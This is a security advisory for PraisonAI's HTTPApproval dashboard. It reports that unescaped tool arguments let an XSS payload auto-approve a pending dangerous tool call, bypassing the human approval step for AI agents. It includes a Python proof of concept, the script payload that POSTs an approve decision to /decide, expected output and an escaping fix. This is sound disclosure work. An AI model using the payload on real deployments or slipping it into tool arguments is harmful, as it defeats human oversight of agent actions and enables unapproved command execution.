PraisonAI: HTTPApproval dashboard renders tool arguments as raw HTML, allowing approval-page XSS to approve dangerous tools
📋 Description
HTTPApproval dashboard renders tool arguments as raw HTML, allowing approval-page XSS to approve dangerous tools
Summary
praisonai.bots.HTTPApproval renders pending tool approval arguments directly
into the approval dashboard HTML. An attacker-controlled tool argument can
inject JavaScript into that page. When a human opens the approval URL to inspect
the risky tool request, the script runs in the dashboard origin and can POST to
the same request's /approve/{request_id}/decide endpoint, causing
HTTPApproval to return approved=True.
The local PoV uses a harmless touch /tmp/prai010 # command prefix and stops at
the approval decision. It does not execute the command.
Affected Versions
Proposed affected range: >= 4.5.2, <= 4.6.57.
Validated affected:
- current head
2f9677abb2ea68eab864ee8b6a828fd0141612e1(v4.6.57-4-g2f9677ab) v4.5.2v4.5.3v4.5.124v4.5.126v4.5.128v4.6.10v4.6.56v4.6.57
v4.5.0 and v4.5.1 do not contain the HTTPApproval backend.
Impact
An attacker who can influence an agent task or prompt enough to produce a dangerous tool call can embed a short XSS payload in the tool argument. When the human approver opens the HTTP approval page, the script can approve the pending dangerous tool call before the human explicitly clicks Approve or Deny.
This bypasses the human-in-the-loop approval boundary for dangerous tools such
as execute_command, execute_code, delete_file, or other tools gated
through HTTPApproval. If the agent continues after approval, the dangerous
tool runs with the privileges of the PraisonAI process.
Why This Is Not Intended Behavior
PraisonAI documentation describes approval as a safety control that pauses an
agent before risky tools and asks a human or configured channel to allow or deny
execution. The documentation also lists http as a supported non-console
approval backend.
Opening the approval page to inspect a risky command should not itself approve the command. The current behavior allows attacker-controlled tool arguments to execute script in the approval page and submit the approval action.
This is distinct from the previously published stored-XSS advisory for agent
output rendering. That advisory concerned src/praisonai/api.py and missing
nh3 sanitization in older versions. This report concerns the HTTPApproval
dashboard sink and remains present in current head.
Root Cause
In src/praisonai/praisonai/bots/_http_approval.py, _build_html() builds the
approval page with raw f-string interpolation:
- argument keys and values are appended to
args_htmlwithout HTML escaping; tool_name,risk_level, andagent_nameare also interpolated into the returned HTML;- the generated page contains same-origin JavaScript that posts to
/approve/{request_id}/decide.
_handle_decide() accepts JSON from that endpoint and marks the pending request
approved when decision == "approve".
Because the approval page is generated from the pending request's unescaped tool
arguments, an injected script can call the same endpoint that the legitimate
Approve button uses. The request id is unguessable, but the script runs inside
the loaded approval page and can derive the endpoint from location.pathname.
Reproduction
The PoV is local-only and does not execute the dangerous tool command. Run it
from a PraisonAI checkout or environment where praisonai and
praisonaiagents import from the candidate version.
import asyncio
import json
import socket
import aiohttp
from praisonai.bots._http_approval import HTTPApproval
from praisonaiagents.approval.protocols import ApprovalRequest
def free_port():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.bind(("127.0.0.1", 0))
return sock.getsockname()[1]
payload = (
"touch /tmp/prai010 # "
"</code><script>"
"fetch(location.pathname+'/decide',{"
"method:'POST',headers:{'Content-Type':'application/json'},"
"body:'{\"decision\":\"approve\"}'})"
"</script><code>"
)
async def main():
backend = HTTPApproval(host="127.0.0.1", port=free_port(), timeout=5)
request = ApprovalRequest(
tool_name="execute_command",
arguments={"command": payload},
risk_level="critical",
agent_name="pov-agent",
)
task = asyncio.create_task(backend.request_approval(request))
request_id = ""
for _ in range(100):
if backend._pending:
request_id = next(iter(backend._pending))
break
await asyncio.sleep(0.05)
assert request_id
url = f"http://127.0.0.1:{backend._port}/approve/{request_id}"
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
page = await response.text()
raw_script_present = "<script>fetch(location.pathname+'/decide'" in page
script_not_html_escaped = "<script" not in page
payload_uses_same_origin_decide_endpoint = "fetch(location.pathname+'/decide'" in page
payload_not_truncated = "..." not in page[
page.find("<script>"):page.find("<script>") + len(payload) + 10
]
assert raw_script_present
assert script_not_html_escaped
assert payload_not_truncated
# Same request the injected same-origin script submits.
async with session.post(f"{url}/decide", json={"decision": "approve"}) as response:
post_body = await response.text()
decision = await task
await backend.shutdown()
print(json.dumps({
"payload_len": len(payload),
"payload_shell_prefix": "touch /tmp/prai010",
"raw_script_present": raw_script_present,
"script_not_html_escaped": script_not_html_escaped,
"payload_uses_same_origin_decide_endpoint": payload_uses_same_origin_decide_endpoint,
"payload_not_truncated": payload_not_truncated,
"post_body": post_body,
"decision_approved": decision.approved,
"decision_reason": decision.reason,
"vulnerable": bool(
raw_script_present
and script_not_html_escaped
and payload_uses_same_origin_decide_endpoint
and payload_not_truncated
and decision.approved
),
}, indent=2))
asyncio.run(main())
Expected affected output includes:
{
"payload_len": 175,
"payload_shell_prefix": "touch /tmp/prai010",
"raw_script_present": true,
"script_not_html_escaped": true,
"payload_uses_same_origin_decide_endpoint": true,
"payload_not_truncated": true,
"decision_approved": true,
"vulnerable": true
}
The relevant injected argument shape is:
touch /tmp/prai010 # </code><script>fetch(location.pathname+'/decide',{method:'POST',headers:{'Content-Type':'application/json'},body:'{"decision":"approve"}'})</script><code>
The shell prefix demonstrates that the same argument can be executable shell syntax after approval; the PoV stops before executing the tool.
Suggested Fix
Escape every untrusted value before inserting it into the approval HTML:
tool_namerisk_levelagent_name- every argument key
- every argument value
For example, use html.escape(str(value), quote=True) or a template engine that
auto-escapes by default. Add regression tests that include </code><script>...
in tool arguments and assert that the rendered page contains escaped text, not a
script element.
Minimal patch shape:
from html import escape
def h(value: object) -> str:
return escape(str(value), quote=True)
tool_name = h(info.get("tool_name", "unknown"))
risk_level = h(info.get("risk_level", "unknown"))
agent_name = h(info.get("agent_name", ""))
args_html = ""
for k, v in arguments.items():
val_str = str(v)
if len(val_str) > 200:
val_str = val_str[:197] + "..."
args_html += (
f"<tr><td><code>{h(k)}</code></td>"
f"<td><code>{h(val_str)}</code></td></tr>"
)
Additional hardening:
- avoid inline JavaScript and add a restrictive Content Security Policy;
- keep the request id as an unguessable capability, but do not rely on it as an XSS defense;
- consider requiring a per-request decision token outside attacker-controlled rendered argument fields.
🎯 Affected products1
- pip/praisonai:>= 4.5.2, <= 4.6.58